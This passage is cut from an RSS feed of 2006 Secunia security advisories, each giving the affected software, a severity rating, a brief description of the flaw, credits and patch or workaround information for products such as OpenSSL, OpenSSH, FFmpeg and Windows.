	Want to know the next time vulnerabilities are fixed in this product?<br>
- Companies can be alerted via email and SMS!<br>
<br>
<br>
Description:<br>
Pedram Amini has reported a vulnerability in BrightStor ARCserver Backup, which can be exploited by malicious people to compromise a vulnerable system.<br>
<br>
The vulnerability is caused due to a boundary error within the handling of long messages received over the "CheyenneDS" Mailslot. This can be exploited to cause a stack-based buffer overflow by sending an overly long message.<br>
<br>
The vulnerability has been reported in version R11.5. Prior versions may also be affected.<br>
<br>
Solution:<br>
Update to the latest version.<br>
http://supportconnect.ca.com<br>
<br>
Provided and/or discovered by:<br>
Pedram Amini, TippingPoint Security Research Team.<br>
<br>
Original Advisory:<br>
TippingPoint:<br>
http://www.tippingpoint.com/security/advisories/TSRT-06-12.html<br>
<br>
CA:<br>
http://supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp]]></description>
            <link>http://secunia.com/advisories/22283/</link>
            <pubDate>Mon, 09 Oct 2006 09:40:06 -0400</pubDate>
        </item>

        <item>
            <title>Linux Kernel Denial of Service Vulnerabilities</title>
            <description><![CDATA[Secunia Advisory:   	 SA22279  	  <br>
Release Date: 	2006-10-06<br>
<br>
Critical: 	<br>
Moderately critical<br>
Impact: 	DoS<br>
Where: 	From remote<br>
Solution Status: 	Vendor Patch<br>
<br>
OS:	Linux Kernel 2.6.x<br>
<br>
CVE reference:	CVE-2006-3741 (Secunia mirror)<br>
CVE-2006-4997 (Secunia mirror)<br>
<br>
	Want to know the next time vulnerabilities are fixed in this product?<br>
- Companies can be alerted via email and SMS!<br>
<br>
<br>
Description:<br>
Some vulnerabilities have been reported in the Linux Kernel, which can be exploited by malicious, local users and malicious people to cause a DoS (Denial of Service).<br>
<br>
1) The "sys_perfmon()" function on Itanium (IA64) systems does not correctly handle file descriptor reference counts, which can be exploited to cause a DoS by consuming all available file descriptors.<br>
<br>
2) The "clip_mkip()" function in net/atm/clip.c may dereference a previously freed pointer when processing received data, which can be exploited to cause a kernel panic.<br>
<br>
Solution:<br>
Update to version 2.6.18.<br>
<br>
Provided and/or discovered by:<br>
1) Reported by the vendor.<br>
2) ADLab, Venustech info Ltd CHINA.<br>
<br>
Original Advisory:<br>
http://www.kernel.org/git/?p=linux/ke...44d00762703e1b6146fce12ce2684885f8bf6<br>
http://www.kernel.org/git/?p=linux/ke...6109a9dfd9327fdbe630fc819e1b7450986b2<br>
]]></description>
            <link>http://secunia.com/advisories/22279/</link>
            <pubDate>Mon, 09 Oct 2006 09:39:21 -0400</pubDate>
        </item>

        <item>
            <title>Symantec Support Tool ActiveX Control Vulnerabilities</title>
            <description><![CDATA[Secunia Advisory:   	 SA22228  	  <br>
Release Date: 	2006-10-06<br>
<br>
Critical: 	<br>
Less critical<br>
Impact: 	Exposure of system information<br>
System access<br>
Where: 	From remote<br>
Solution Status: 	Vendor Patch<br>
<br>
Software:	Symantec Automated Support Assistant<br>
Symantec Norton AntiVirus 2005<br>
Symantec Norton AntiVirus 2006<br>
Symantec Norton Internet Security 2005<br>
Symantec Norton Internet Security 2006<br>
Symantec Norton SystemWorks 2005<br>
Symantec Norton SystemWorks 2006<br>
<br>
	Want to know the next time vulnerabilities are fixed in this product?<br>
- Companies can be alerted via email and SMS!<br>
<br>
<br>
Description:<br>
Some vulnerabilities have been reported in Support Tool ActiveX Control included in various Symantec products, which potentially can be exploited by malicious people to disclose system information or to compromise a vulnerable system.<br>
<br>
1) An unspecified input validation error exists, which can be exploited to gain unauthorized access to system information.<br>
<br>
2) An unspecified boundary error exist, which can be exploited to cause a stack-based buffer overflow and may allow execution of arbitrary code with privileges of the user running the browser.<br>
<br>
Successful exploitation requires spoofing of a trusted domain web site and to trick the user to click on a malicious link.<br>
<br>
The following products are affected:<br>
* Symantec Automated Support Assistant<br>
* Symantec Norton AntiVirus 2005, 2006<br>
* Symantec Norton Internet Security 2005, 2006<br>
* Symantec Norton SystemWorks 2005, 2006<br>
<br>
Solution:<br>
Norton AntiVirus, Norton Internet Security, Norton System Works:<br>
Apply latest updates via LiveUpdate.<br>
<br>
Automated Support Assistant:<br>
Update to the latest version.<br>
https://www-secure.symantec.com/techsupp/asa/install.jsp<br>
<br>
Provided and/or discovered by:<br>
The vendor credits John Haesman, Next Generation Security Research.<br>
<br>
Original Advisory:<br>
http://securityresponse.symantec.com/avcenter/security/Content/2006.10.05.html]]></description>
            <link>http://secunia.com/advisories/22228/</link>
            <pubDate>Mon, 09 Oct 2006 09:38:44 -0400</pubDate>
        </item>

        <item>
            <title>Xerox ESS/ Network Controller and MicroServer &quot;WebUI&quot; Vulnerability</title>
            <description><![CDATA[Secunia Advisory:   	 SA22252  	  <br>
Release Date: 	2006-10-05<br>
<br>
Critical: 	<br>
Highly critical<br>
Impact: 	System access<br>
Where: 	From remote<br>
Solution Status: 	Vendor Patch<br>
<br>
OS:	Xerox WorkCentre<br>
Xerox WorkCentre Pro<br>
<br>
	Want to know the next time vulnerabilities are fixed in this product?<br>
- Companies can be alerted via email and SMS!<br>
<br>
<br>
Description:<br>
A vulnerability has been reported in Xerox WorkCentre Pro and Xerox WorkCentre, which can be exploited by malicious people to compromise a vulnerable system.<br>
<br>
The vulnerability is due to an unspecified error in WebUI, which can be exploited to inject and execute arbitrary commands.<br>
<br>
The vulnerabilities affect the following products:<br>
* WorkCentre 232, 238, 245, 255, 265, 275<br>
* WorkCentre Pro 232, 238, 245, 255, 265, 275<br>
<br>
Solution:<br>
See patch matrix in vendor advisory to apply patch P29.<br>
http://www.xerox.com/downloads/usa/en/c/cert_P29_WC2xx-Only_HTTP.zip<br>
<br>
Provided and/or discovered by:<br>
The vendor credits Brendan O'Connor.<br>
<br>
Original Advisory:<br>
http://www.xerox.com/downloads/usa/en/c/cert_XRX06_005.pdf]]></description>
            <link>http://secunia.com/advisories/22252/</link>
            <pubDate>Mon, 09 Oct 2006 09:37:56 -0400</pubDate>
        </item>

        <item>
            <title>IBM Rational RequisitePro OpenSSL Vulnerability</title>
            <description><![CDATA[Secunia Advisory:   	 SA22249  	  <br>
Release Date: 	2006-10-04<br>
<br>
Critical: 	<br>
Highly critical<br>
Impact: 	DoS<br>
System access<br>
Where: 	From remote<br>
Solution Status: 	Unpatched<br>
<br>
Software:	IBM Rational RequisitePro 2003.x<br>
<br>
	This advisory is currently marked as unpatched!<br>
- Companies can be alerted when a patch is released!<br>
<br>
<br>
Description:<br>
IBM has acknowledged a vulnerability in Rational RequisitePro RequisiteWeb, which can be exploited by malicious people to cause a DoS (Denial of Service) or to compromise a vulnerable system.<br>
<br>
For more information:<br>
SA9886<br>
<br>
Solution:<br>
Upgrade to version 7.0.<br>
<br>
Provided and/or discovered by:<br>
Reported by the vendor.<br>
<br>
Original Advisory:<br>
IBM:<br>
http://www-1.ibm.com/support/docview.wss?uid=swg21247112<br>
<br>
Other References:<br>
SA9886:<br>
http://secunia.com/advisories/9886/<br>
<br>
<br>
]]></description>
            <link>http://secunia.com/advisories/22249/</link>
            <pubDate>Mon, 09 Oct 2006 09:37:17 -0400</pubDate>
        </item>

        <item>
            <title>CA Unicenter Web Service Distributed Management Directory Traversal</title>
            <description><![CDATA[Secunia Advisory:   	 SA22229  	  <br>
Release Date: 	2006-10-04<br>
<br>
Critical: 	<br>
Moderately critical<br>
Impact: 	Exposure of system information<br>
Exposure of sensitive information<br>
Where: 	From remote<br>
Solution Status: 	Vendor Patch<br>
<br>
Software:	CA Unicenter Web Services Distributed Management 3.x<br>
<br>
	Want to know the next time vulnerabilities are fixed in this product?<br>
- Companies can be alerted via email and SMS!<br>
<br>
<br>
Description:<br>
A vulnerability has been reported in CA Unicenter Web Services Distributed Management (WSDM), which can be exploited by malicious people to disclose sensitive information.<br>
<br>
The vulnerability is caused due to an error within the included Jetty WebServer, which does not correctly check path names in HTTP requests. This can be exploited to access arbitrary files on a vulnerable system via directory traversal attacks.<br>
<br>
The vulnerability has been reported in versions prior to version 3.11. Other versions may also be affected.<br>
<br>
Note: This vulnerability may be related to:<br>
SA7178<br>
<br>
Solution:<br>
Update to WSDM 3.11 or later.<br>
<br>
Provided and/or discovered by:<br>
Oliver Karow and Richard Sammet, Symantec<br>
<br>
Original Advisory:<br>
http://lists.grok.org.uk/pipermail/full-disclosure/2006-October/049846.html<br>
<br>
Other References:<br>
SA7178:<br>
http://secunia.com/advisories/7178/]]></description>
            <link>http://secunia.com/advisories/22229/</link>
            <pubDate>Mon, 09 Oct 2006 09:36:44 -0400</pubDate>
        </item>

        <item>
            <title>Kolab Server Multiple Vulnerabilities</title>
            <description><![CDATA[Secunia Advisory:   	 SA22216  	  <br>
Release Date: 	2006-10-04<br>
<br>
Critical: 	<br>
Highly critical<br>
Impact: 	DoS<br>
System access<br>
Where: 	From remote<br>
Solution Status: 	Vendor Patch<br>
<br>
Software:	Kolab Server 2.x<br>
<br>
CVE reference:	CAN-2006-2937 (Secunia mirror)<br>
CAN-2006-2940 (Secunia mirror)<br>
CAN-2006-3738 (Secunia mirror)<br>
CAN-2006-4343 (Secunia mirror)<br>
<br>
	Want to know the next time vulnerabilities are fixed in this product?<br>
- Companies can be alerted via email and SMS!<br>
<br>
<br>
Description:<br>
Some vulnerabilities have been reported in Kolab Server, which can be exploited by malicious people to cause a DoS (Denial of Service) and compromise a vulnerable system.<br>
<br>
For more information:<br>
SA22130<br>
<br>
Solution:<br>
Follow the vendor's instructions to update your system.<br>
http://kolab.org/security/kolab-vendor-notice-11.txt<br>
<br>
Original Advisory:<br>
http://kolab.org/security/kolab-vendor-notice-11.txt<br>
<br>
Other References:<br>
SA22130:<br>
http://secunia.com/advisories/22130/<br>
]]></description>
            <link>http://secunia.com/advisories/22216/</link>
            <pubDate>Mon, 09 Oct 2006 09:36:22 -0400</pubDate>
        </item>

        <item>
            <title>Skype URI Argument Handling Format String Vulnerability</title>
            <description><![CDATA[Secunia Advisory:   	 SA22185  	  <br>
Release Date: 	2006-10-03<br>
<br>
Critical: 	<br>
Highly critical<br>
Impact: 	System access<br>
Where: 	From remote<br>
Solution Status: 	Vendor Patch<br>
<br>
Software:	Skype for Mac 1.x<br>
<br>
CVE reference:	CVE-2006-5084 (Secunia mirror)<br>
<br>
	Want to know the next time vulnerabilities are fixed in this product?<br>
- Companies can be alerted via email and SMS!<br>
<br>
<br>
Description:<br>
Tom Ferris has reported a vulnerability in Skype for Mac, which potentially can be exploited by malicious people to compromise a user's system.<br>
<br>
The vulnerability is caused due to a format string error within the handling of URI arguments and can be exploited via a specially crafted Skype URL containing format specifiers.<br>
<br>
Successful exploitation may allow execution of arbitrary code.<br>
<br>
The vulnerability affects versions 1.5.*.79 and prior.<br>
<br>
Solution:<br>
Update to version 1.5.0.80.<br>
http://www.skype.com/download/<br>
<br>
Provided and/or discovered by:<br>
Tom Ferris<br>
<br>
Original Advisory:<br>
Skype:<br>
http://www.skype.com/security/skype-sb-2006-002.html]]></description>
            <link>http://secunia.com/advisories/22185/</link>
            <pubDate>Tue, 03 Oct 2006 15:50:13 -0400</pubDate>
        </item>

        <item>
            <title>OpenVPN Multiple Vulnerabilities</title>
            <description><![CDATA[Secunia Advisory:   	 SA22232  	  <br>
Release Date: 	2006-10-02<br>
<br>
Critical: 	<br>
Highly critical<br>
Impact: 	DoS<br>
System access<br>
Where: 	From remote<br>
Solution Status: 	Vendor Patch<br>
<br>
Software:	OpenVPN 2.x<br>
<br>
CVE reference:	CVE-2006-2937 (Secunia mirror)<br>
CVE-2006-2940 (Secunia mirror)<br>
CVE-2006-3738 (Secunia mirror)<br>
CVE-2006-4343 (Secunia mirror)<br>
<br>
<br>
Description:<br>
Some vulnerabilities have been reported in OpenVPN, which can be exploited by malicious people to cause a DoS (Denial of Service) or potentially compromise a vulnerable system.<br>
<br>
The OpenVPN Windows Installer prior to 2.0.9 includes vulnerable versions of the OpenSSL DLL files.<br>
<br>
For more information:<br>
SA22130<br>
<br>
Solution:<br>
Update to version 2.0.9.<br>
<br>
Provided and/or discovered by:<br>
Reported by the vendor.<br>
<br>
Original Advisory:<br>
http://openvpn.net/changelog.html<br>
<br>
Other References:<br>
SA21846:<br>
http://secunia.com/advisories/21846/]]></description>
            <link>http://secunia.com/advisories/22232/</link>
            <pubDate>Mon, 02 Oct 2006 14:09:53 -0400</pubDate>
        </item>

        <item>
            <title>OpenSSH Signal Handling Vulnerability</title>
            <description><![CDATA[Secunia Advisory:   	 SA22173  	  <br>
Release Date: 	2006-09-29<br>
<br>
Critical: 	<br>
Highly critical<br>
Impact: 	DoS<br>
System access<br>
Where: 	From remote<br>
Solution Status: 	Vendor Patch<br>
<br>
Software:	OpenSSH 3.x<br>
OpenSSH 4.x<br>
<br>
CVE reference:	CVE-2006-5051 (Secunia mirror)<br>
CVE-2006-5052 (Secunia mirror)<br>
<br>
<br>
Description:<br>
Mark Dowd reported a vulnerability in OpenSSH, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise of a vulnerable system.<br>
<br>
The vulnerability is caused due to a race condition within the signal handling. This can be exploited to crash the OpenSSH server and potentially allows the execution of arbitrary code.<br>
<br>
The vulnerability has been reported in version 4.3. Prior versions may also be affected.<br>
<br>
Solution:<br>
Update to OpenSSH 4.4.<br>
<br>
Provided and/or discovered by:<br>
Mark Dowd<br>
<br>
Changelog:<br>
2006-09-29: Added CVE reference.<br>
<br>
Original Advisory:<br>
http://openssh.org/txt/release-4.4<br>
<br>
Other References:<br>
http://rhn.redhat.com/errata/RHSA-2006-0697.html]]></description>
            <link>http://secunia.com/advisories/22173/</link>
            <pubDate>Mon, 02 Oct 2006 14:08:42 -0400</pubDate>
        </item>

        <item>
            <title>FileZilla / FileZilla Server Multiple Vulnerabilities</title>
            <description><![CDATA[Secunia Advisory:   	 SA22094  	  <br>
Release Date: 	2006-10-02<br>
<br>
Critical: 	<br>
Highly critical<br>
Impact: 	DoS<br>
System access<br>
Where: 	From remote<br>
Solution Status: 	Vendor Patch<br>
<br>
Software:	FileZilla 2.x<br>
FileZilla Server 0.x<br>
<br>
CVE reference:	CVE-2006-2937 (Secunia mirror)<br>
CVE-2006-2940 (Secunia mirror)<br>
CVE-2006-3738 (Secunia mirror)<br>
CVE-2006-4343 (Secunia mirror)<br>
<br>
<br>
Description:<br>
Some vulnerabilities have been reported in FileZilla and FileZilla Server, which can be exploited by malicious people to cause a DoS (Denial of Service) and compromise a vulnerable system.<br>
<br>
The vulnerabilities are caused due to the use of a vulnerable OpenSSL version.<br>
<br>
For more information:<br>
SA22130<br>
<br>
Solution:<br>
FileZilla:<br>
Update to version 2.2.28.<br>
<br>
FileZilla Server:<br>
Update to version 0.9.19.<br>
<br>
Original Advisory:<br>
http://sourceforge.net/forum/forum.php?forum_id=617485<br>
<br>
Other References:<br>
SA22130:<br>
http://secunia.com/advisories/22130/<br>
]]></description>
            <link>http://secunia.com/advisories/22094/</link>
            <pubDate>Mon, 02 Oct 2006 14:04:45 -0400</pubDate>
        </item>

        <item>
            <title>FFmpeg Multiple Buffer Overflow Vulnerabilities</title>
            <description><![CDATA[Secunia Advisory:   	 SA22180  	  <br>
Release Date: 	2006-09-29<br>
<br>
Critical: 	<br>
Moderately critical<br>
Impact: 	DoS<br>
System access<br>
Where: 	From remote<br>
Solution Status: 	Vendor Workaround<br>
<br>
Software:	FFmpeg 0.x<br>
<br>
CVE reference:	CVE-2006-4800 (Secunia mirror)<br>
<br>
<br>
Description:<br>
Some vulnerabilities have been reported in FFmpeg, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise a vulnerable system.<br>
<br>
The vulnerabilities are caused due to various boundary errors within libavformat/rm.c, libavformat/sierravmd.c, libavformat/smacker.c, libavformat/tta.c, libavcodec/vorbis.c, libavcodec/dtsdec.c, libavcodec/4xm.c, libavcodec/alac.c, libavcodec/cook.c, libavcodec/shorten.c, libavcodec/snow.c, libavcodec/tta.c, and libavcodec/smacker.c. This can be exploited to cause buffer overflows when a specially crafted media file is opened.<br>
<br>
Successful exploitation may potentially allow execution of arbitrary code.<br>
<br>
Solution:<br>
The vulnerabilities have been fixed in the CVS repository.<br>
<br>
Provided and/or discovered by:<br>
Disclosed via CVS commits by the vendor.]]></description>
            <link>http://secunia.com/advisories/22180/</link>
            <pubDate>Mon, 02 Oct 2006 14:04:14 -0400</pubDate>
        </item>

        <item>
            <title>xine-lib FFmpeg Multiple Buffer Overflow Vulnerabilities</title>
            <description><![CDATA[Secunia Advisory:   	 SA22181  	  <br>
Release Date: 	2006-09-29<br>
<br>
Critical: 	<br>
Highly critical<br>
Impact: 	DoS<br>
System access<br>
Where: 	From remote<br>
Solution Status: 	Vendor Workaround<br>
<br>
Software:	xine-lib 1.x<br>
<br>
CVE reference:	CVE-2006-4800 (Secunia mirror)<br>
<br>
<br>
Description:<br>
Some vulnerabilities have been reported in xine-lib, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise a vulnerable system.<br>
<br>
The vulnerabilities are caused due to the use of a vulnerable version of FFmpeg.<br>
<br>
For more information:<br>
SA22180<br>
<br>
Solution:<br>
The vulnerabilities have been fixed in CVS.<br>
<br>
Other References:<br>
SA22180:<br>
http://secunia.com/advisories/22180/<br>
]]></description>
            <link>http://secunia.com/advisories/22181/</link>
            <pubDate>Mon, 02 Oct 2006 14:03:30 -0400</pubDate>
        </item>

        <item>
            <title>MPlayer FFmpeg Multiple Buffer Overflow Vulnerabilities</title>
            <description><![CDATA[Secunia Advisory:   	 SA22182  	  <br>
Release Date: 	2006-09-29<br>
<br>
Critical: 	<br>
Highly critical<br>
Impact: 	DoS<br>
System access<br>
Where: 	From remote<br>
Solution Status: 	Vendor Patch<br>
<br>
Software:	MPlayer 1.x<br>
<br>
CVE reference:	CVE-2006-4800 (Secunia mirror)<br>
<br>
<br>
Description:<br>
Some vulnerabilities have been reported in MPlayer, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise a vulnerable system.<br>
<br>
The vulnerabilities are caused due to the use of a vulnerable version of FFmpeg.<br>
<br>
For more information:<br>
SA22180<br>
<br>
Solution:<br>
Update to MPlayer-1.0pre8.<br>
<br>
Other References:<br>
SA22180:<br>
http://secunia.com/advisories/22180/<br>
]]></description>
            <link>http://secunia.com/advisories/22182/</link>
            <pubDate>Mon, 02 Oct 2006 14:01:48 -0400</pubDate>
        </item>

        <item>
            <title>Avaya Products Linux Kernel Multiple Vulnerabilities</title>
            <description><![CDATA[Avaya Products Linux Kernel Multiple Vulnerabilities   	 Advisory Available in Danish <br>
<br>
Secunia Advisory: 	SA22174 	 <br>
Release Date: 	2006-09-28<br>
<br>
Critical: 	<br>
Moderately critical<br>
Impact: 	Privilege escalation<br>
DoS<br>
Where: 	From remote<br>
Solution Status: 	Unpatched<br>
<br>
OS:	Avaya S8XXX Media Servers<br>
<br>
CVE reference:	CVE-2004-2660 (Secunia mirror)<br>
CVE-2006-1858 (Secunia mirror)<br>
CVE-2006-2444 (Secunia mirror)<br>
CVE-2006-2932 (Secunia mirror)<br>
CVE-2006-2935 (Secunia mirror)<br>
CVE-2006-2936 (Secunia mirror)<br>
CVE-2006-3468 (Secunia mirror)<br>
CVE-2006-3626 (Secunia mirror)<br>
CVE-2006-3745 (Secunia mirror)<br>
<br>
<br>
Description:<br>
Avaya has acknowledged some vulnerabilities in various Avaya products, which can be exploited by malicious, local users to cause a DoS or gain escalated privileges and by malicious people to cause a DoS.<br>
<br>
For more information:<br>
SA20185<br>
SA20225<br>
SA20703<br>
SA21041<br>
SA21369<br>
SA21515<br>
<br>
The vulnerabilities affect:<br>
* Avaya S87XX/S8500/S8300 (CM 3.x)<br>
<br>
Solution:<br>
The vendor recommends that local and network access to the affected systems should be restricted until an update is available.<br>
<br>
Original Advisory:<br>
http://support.avaya.com/elmodocs2/security/ASA-2006-203.htm<br>
<br>
Other References:<br>
SA20185:<br>
http://secunia.com/advisories/20185/<br>
<br>
SA20225:<br>
http://secunia.com/advisories/20225/]]></description>
            <link>http://secunia.com/advisories/22174/</link>
            <pubDate>Mon, 02 Oct 2006 14:00:59 -0400</pubDate>
        </item>

        <item>
            <title>Microsoft Windows Shell Code Execution Vulnerability (UNPATCHED/EXPLOIT)</title>
            <description><![CDATA[Secunia Advisory:   	 SA22159  	  <br>
Release Date: 	2006-09-28<br>
Last Update: 	2006-09-29<br>
<br>
Critical: 	<br>
Extremely critical<br>
Impact: 	System access<br>
Where: 	From remote<br>
Solution Status: 	Unpatched<br>
<br>
OS:	Microsoft Windows 2000 Advanced Server<br>
Microsoft Windows 2000 Datacenter Server<br>
Microsoft Windows 2000 Professional<br>
Microsoft Windows 2000 Server<br>
Microsoft Windows Server 2003 Datacenter Edition<br>
Microsoft Windows Server 2003 Enterprise Edition<br>
Microsoft Windows Server 2003 Standard Edition<br>
Microsoft Windows Server 2003 Web Edition<br>
Microsoft Windows XP Home Edition<br>
Microsoft Windows XP Professional<br>
<br>
CVE reference:	CVE-2006-3730 (Secunia mirror)<br>
<br>
<br>
Description:<br>
H D Moore has discovered a vulnerability in Microsoft Windows, which can be exploited by malicious people to compromise a user's system.<br>
<br>
The vulnerability is caused due to an error in the Windows Shell and is exposed via the "setSlice()" method in the WebViewFolderIcon ActiveX control (webvw.dll). This can e.g. be exploited via Internet Explorer by a malicious website to corrupt memory by passing specially crafted arguments to the "setSlice()" method.<br>
<br>
Successful exploitation allows execution of arbitrary code.<br>
<br>
NOTE: Exploit code is publicly available.<br>
<br>
The vulnerability is confirmed on a fully patched system with Internet Explorer 6.0 and Microsoft Windows XP SP2. Other versions may also be affected.<br>
<br>
Solution:<br>
Set the kill bit for the "WebViewFolderIcon" ActiveX control (see Microsoft advisory for details).<br>
<br>
Only allow trusted websites to run ActiveX controls.<br>
<br>
Provided and/or discovered by:<br>
H D Moore<br>
<br>
Changelog:<br>
2006-09-29: Added additional information provided by Microsoft. Added link to Microsoft advisory and updated "Solution" section. Updated affected software.<br>
<br>
Original Advisory:<br>
H D Moore:<br>
http://browserfun.blogspot.com/2006/07/mobb-18-webviewfoldericon-setslice.html<br>
<br>
Microsoft:<br>
http://www.microsoft.com/technet/security/advisory/926043.mspx<br>
]]></description>
            <link>http://secunia.com/advisories/22159/</link>
            <pubDate>Mon, 02 Oct 2006 13:59:52 -0400</pubDate>
        </item>

        <item>
            <title>OpenSSL Multiple Vulnerabilities</title>
            <description><![CDATA[OpenSSL Multiple Vulnerabilities   	 Advisory Available in Danish <br>
<br>
Secunia Advisory: 	SA22130 	 <br>
Release Date: 	2006-09-28<br>
Last Update: 	2006-09-29<br>
<br>
Critical: 	<br>
Highly critical<br>
Impact: 	DoS<br>
System access<br>
Where: 	From remote<br>
Solution Status: 	Vendor Patch<br>
<br>
Software:	OpenSSL 0.9.x<br>
<br>
CVE reference:	CVE-2006-2937 (Secunia mirror)<br>
CVE-2006-2940 (Secunia mirror)<br>
CVE-2006-3738 (Secunia mirror)<br>
CVE-2006-4343 (Secunia mirror)<br>
<br>
<br>
Description:<br>
Some vulnerabilities have been reported in OpenSSL, which can be exploited by malicious people to cause a DoS (Denial of Service) and compromise a vulnerable system.<br>
<br>
1) An error in the processing of certain invalid ASN.1 structures can be exploited to cause an infinite loop and consume system memory in an application using OpenSSL to process ASN.1 data from untrusted sources.<br>
<br>
NOTE: This does not affect versions prior to 0.9.7.<br>
<br>
2) Certain types of public keys take overly long time to process and can be exploited to cause a DoS in an application using OpenSSL to process ASN.1 data from untrusted sources.<br>
<br>
3) An error in the "SSL_get_shared_ciphers()" function can be exploited to cause a buffer overflow by sending a list of ciphers to an application using the vulnerable function.<br>
<br>
Successful exploitation allows execution of arbitrary code.<br>
<br>
4) An error in the SSLv2 client code can be exploited by a malicious server to crash a vulnerable client using OpenSSL to create an SSLv2 connection to the server.<br>
<br>
Solution:<br>
OpenSSL 0.9.7 branch:<br>
Update to version 0.9.7l or later.<br>
<br>
OpenSSL 0.9.8 branch:<br>
Update to version 0.9.8d or later.<br>
<br>
Provided and/or discovered by:<br>
1, 2) Dr. S. N. Henson, Open Network Security<br>
3, 4) Tavis Ormandy and Will Drewry, Google Security Team<br>
<br>
Changelog:<br>
2006-09-29: Updated advisory with additional information. Increased criticality. Added links to US-CERT vulnerability notes.<br>
<br>
Original Advisory:<br>
http://www.openssl.org/news/secadv_20060928.txt<br>
<br>
Other References:<br>
US-CERT VU#247744:<br>
http://www.kb.cert.org/vuls/id/247744<br>
<br>
US-CERT VU#386964:<br>
http://www.kb.cert.org/vuls/id/386964<br>
<br>
US-CERT VU#423396:<br>
http://www.kb.cert.org/vuls/id/423396<br>
<br>
US-CERT VU#547300:<br>
http://www.kb.cert.org/vuls/id/547300<br>
]]></description>
            <link>http://secunia.com/advisories/22130/</link>
            <pubDate>Mon, 02 Oct 2006 13:59:01 -0400</pubDate>
        </item>

        <item>
            <title>Microsoft PowerPoint Code Execution Vulnerability (UNPATCHED/EXPLOIT)</title>
            <description><![CDATA[Secunia Advisory:   	 SA22127  	  <br>
Release Date: 	2006-09-28<br>
<br>
Critical: 	<br>
Extremely critical<br>
Impact: 	System access<br>
Where: 	From remote<br>
Solution Status: 	Unpatched<br>
<br>
Software:	Microsoft Office 2000<br>
Microsoft Office 2003 Professional Edition<br>
Microsoft Office 2003 Small Business Edition<br>
Microsoft Office 2003 Standard Edition<br>
Microsoft Office 2003 Student and Teacher Edition<br>
Microsoft Office 2004 for Mac<br>
Microsoft Office X for Mac<br>
Microsoft Office XP<br>
Microsoft PowerPoint 2000<br>
Microsoft PowerPoint 2002<br>
Microsoft Powerpoint 2003<br>
<br>
CVE reference:	CVE-2006-4694 (Secunia mirror)<br>
<br>
<br>
Description:<br>
A vulnerability has been reported in Microsoft PowerPoint, which can be exploited by malicious people to compromise a user's system.<br>
<br>
The vulnerability is due to an unspecified error when processing PowerPoint documents containing a malformed string. This can be exploited to corrupt system memory and may allow execution of arbitrary code when a malicious PowerPoint document is opened.<br>
<br>
NOTE: This vulnerability is reportedly being exploited in the wild.<br>
<br>
Solution:<br>
Do not open untrusted Office documents.<br>
<br>
Provided and/or discovered by:<br>
Reported by the vendor.<br>
<br>
Original Advisory:<br>
Microsoft:<br>
http://www.microsoft.com/technet/security/advisory/925984.mspx<br>
<br>
Other References:<br>
US-CERT VU#231204:<br>
http://www.kb.cert.org/vuls/id/231204]]></description>
            <link>http://secunia.com/advisories/22127/</link>
            <pubDate>Mon, 02 Oct 2006 13:58:07 -0400</pubDate>
        </item>

        <item>
            <title>Sun Solaris Kernel SSL Denial of Service Vulnerability</title>
            <description><![CDATA[Secunia Advisory:   	 SA22136  	  <br>
Release Date: 	2006-09-27<br>
<br>
Critical: 	<br>
Moderately critical<br>
Impact: 	DoS<br>
Where: 	From remote<br>
Solution Status: 	Vendor Patch<br>
<br>
OS:	Sun Solaris 10<br>
<br>
<br>
Description:<br>
A vulnerability has been reported in Sun Solaris, which can be exploited by malicious people to cause a DoS (Denial of Service).<br>
<br>
The vulnerability is caused due to an unspecified error in the Kernel SSL feature when a Kernel SSL Proxy service instance is enabled and can be exploited to cause a system panic.<br>
<br>
Solution:<br>
Apply patch.<br>
<br>
-- SPARC Platform --<br>
<br>
Solaris 10:<br>
Apply patch 123304-01 or later.<br>
<br>
-- x86 Platform --<br>
<br>
Solaris 10:<br>
Apply patch 118855-17 or later.<br>
<br>
Provided and/or discovered by:<br>
Reported by the vendor.<br>
<br>
Original Advisory:<br>
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102563-1]]></description>
            <link>http://secunia.com/advisories/22136/</link>
            <pubDate>Mon, 02 Oct 2006 13:57:42 -0400</pubDate>
        </item>

        <item>
            <title>IBM AIX Inventory Scout Arbitrary File Overwrite Vulnerability</title>
            <description><![CDATA[	<br>
IBM AIX Inventory Scout Arbitrary File Overwrite Vulnerability 	Advisory Available in Danish <br>
<br>
Secunia Advisory: 	SA22062 	 <br>
Release Date: 	2006-09-26<br>
<br>
Critical: 	<br>
Less critical<br>
Impact: 	Manipulation of data<br>
Where: 	Local system<br>
Solution Status: 	Vendor Workaround<br>
<br>
OS:	AIX 5.x<br>
<br>
<br>
Description:<br>
A vulnerability has been reported in IBM AIX, which can be exploited by malicious, local users to perform certain actions with escalated privileges.<br>
<br>
The vulnerability is caused due to an unspecified error in invscoutClient_VPD_Survey when performing a survey of the Vital Product Database. This can be exploited to overwrite the contents of arbitrary files, and can further be exploited e.g. to cause a DoS (Denial of Service).<br>
<br>
The vulnerability has been reported in Inventory Scout for AIX 2.2.0.0 through 2.2.0.9.<br>
<br>
Solution:<br>
Apply Interim fix until APARs are available.<br>
<br>
Interim fix:<br>
ftp://aix.software.ibm.com/aix/efixes/security/invscoutClient_VPD_Survey.tar.Z<br>
<br>
APAR for AIX 5.2.0:<br>
Apply IY88735 (available approx. 2006-10-04).<br>
<br>
APAR for AIX 5.3.0:<br>
Apply IY88735 (available approx. 2006-10-04).<br>
<br>
Provided and/or discovered by:<br>
Reported by the vendor.<br>
<br>
Original Advisory:<br>
IBM:<br>
http://www-1.ibm.com/support/docview.wss?uid=isg1IY88735]]></description>
            <link>http://secunia.com/advisories/22062/</link>
            <pubDate>Tue, 26 Sep 2006 15:21:24 -0400</pubDate>
        </item>

        <item>
            <title>Apple Airport Buffer Overflow and Integer Overflow Vulnerabilities</title>
            <description><![CDATA[Secunia Advisory:   	 SA22068  	  <br>
Release Date: 	2006-09-22<br>
<br>
Critical: 	<br>
Highly critical<br>
Impact: 	DoS<br>
System access<br>
Where: 	From remote<br>
Solution Status: 	Vendor Patch<br>
<br>
OS:	Apple Macintosh OS X<br>
<br>
CVE reference:	CVE-2006-3507 (Secunia mirror)<br>
CVE-2006-3508 (Secunia mirror)<br>
CVE-2006-3509 (Secunia mirror)<br>
<br>
<br>
Description:<br>
